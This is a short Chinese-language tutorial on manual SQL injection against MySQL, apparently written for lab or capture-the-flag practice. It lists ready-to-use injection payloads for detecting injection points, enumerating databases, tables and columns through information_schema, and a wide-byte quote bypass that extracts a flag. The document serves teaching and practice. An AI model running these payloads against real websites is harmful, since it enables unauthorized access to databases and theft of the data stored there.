确定注入点
根据sql查询语句中数据类型的语法分为三类:
- 数字型: SELECT 列 FROM 表 WHERE 数字型列=值
**判断方法**:
- and 1=1和and 1=2
- ?id=1和id=2-1
- 字符型: SELECT 列 FROM 表 WHERE 字符型列=’值’
**判断方法**:
- ' and '1'='1和'and '1'='2
- ' or 1=1 %23
- 搜索型: SELECT * FROM 表 WHERE where 被搜索的列 like ‘%值%’
**判断方法**:
- %' and '%1%'='%1和%'and '%1%'='%2
- ?id=1' or 1=2%23 #页面回显ID=1的数据',说明前面不可能带有%号通配符,如果有,不可能返回是ID=1的数据。可判断不是搜索型
关键:注释或闭合语句,and或or验证。闭合要注意括号、双引号、百分号等。
查询字段数目
注意:#符号在GET请求中必须经过URL编码变为%23,原因是URL通用格式为scheme:[//[user[:password]@]host[:port]][/path][?query][#fragment]
"#"符号规定在整个URL中起锚点作用,也是在URL中属于最后一位。如果你直接在GET请求中输入#,会被认为是一个锚点。而不是自己想要传递的参数。
用order by来判断字段数。
联合查询
内联式注入和终止式注入。union查询的列数和类型要相同。
MySQL常用的系统函数:
version() #MySQL版本
user() #数据库用户名
database() #数据库名
@@datadir #数据库路径
@@version_compile_os #操作系统版本
注意:-- 注释符在GET请求中必须在后面加一些字符,加号或是空格。
查询数据库
-
查询所有数据库:group_concat函数可以把查询的结果并到一列中并默认隔开。
id=1' and 1=2 UNION SELECT 1,2,group_concat(schema_name) from information_schema.schemata --+
查询数据库:单引号数据库、hex编码数据库。
- id=1' and 1=2 UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
- hex编码后在前面加上0x表明这里是16进制编码
查询列名和字段名
在MYSQL5.0之后,MYSQL中存在一张很重要的表叫information_schema。
9.jpeg
完整的注入流程
> ?id=-1%df%27 union select 1,2--+
> 查看数据库名:?id=-1%df%27 union select 1,database()%23
> 查看列名:?id=-1%df%27 union select 1,table_name from information_schema.tables where table_schema=0x73716C35--+
> 查看字段名:?id=-1%df%27 union select 1,column_name from information_schema.columns where table_name=0x6B6579--+
> 查看flag:?id=-1%df%27 union select 1,string from sql5.key--+
